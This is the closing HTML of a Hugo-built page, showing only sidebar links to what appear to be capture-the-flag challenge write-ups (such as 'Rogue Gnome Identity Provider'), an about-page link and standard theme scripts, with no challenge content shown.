            <li class="" data-nav-url="/act2/dosis-network-down/index.html"><a class="padding" href="/act2/dosis-network-down/index.html">Dosis Network Down</a></li>
            <li class="active " data-nav-url="/act2/rogue-gnome-identity-provider/index.html"><a class="padding" href="/act2/rogue-gnome-identity-provider/index.html">Rogue Gnome Identity Provider</a></li>
            <li class="" data-nav-url="/act2/quantognome-leap/index.html"><a class="padding" href="/act2/quantognome-leap/index.html">Quantognome Leap</a></li>
            <li class="" data-nav-url="/act2/going-in-reverse/index.html"><a class="padding" href="/act2/going-in-reverse/index.html">Going in Reverse</a></li></ul></li>
            <li class="" data-nav-url="/about/index.html"><a class="padding" href="/about/index.html">About Roger Johnsen</a></li>
          </ul>
        </div>
        <div class="R-sidebarmenu R-shortcutmenu-shortcuts">
          <ul class="space collapsible-menu">
          </ul>
        </div>
        <div id="R-footer-margin"></div>
        <div class="R-menu-divider default-animation">
          <hr class="padding">
        </div>
        <div class="R-sidebarmenu R-shortcutmenu-footercontrols">
          <ul class="">
          </ul>
        </div>
<div id="R-footer"><p>Built with <a href="https://github.com/McShelby/hugo-theme-relearn" title="love"><i class="fas fa-heart"></i></a> by <a href="https://gohugo.io/">Hugo</a></p></div>
      </div>
    </aside>
    <script src="/js/clipboard/clipboard.min.js?1767539554" defer></script>
    <script src="/js/perfect-scrollbar/perfect-scrollbar.min.js?1767539554" defer></script>
    <script src="/js/theme.js?1767539554" defer></script>
  </body>
</html>
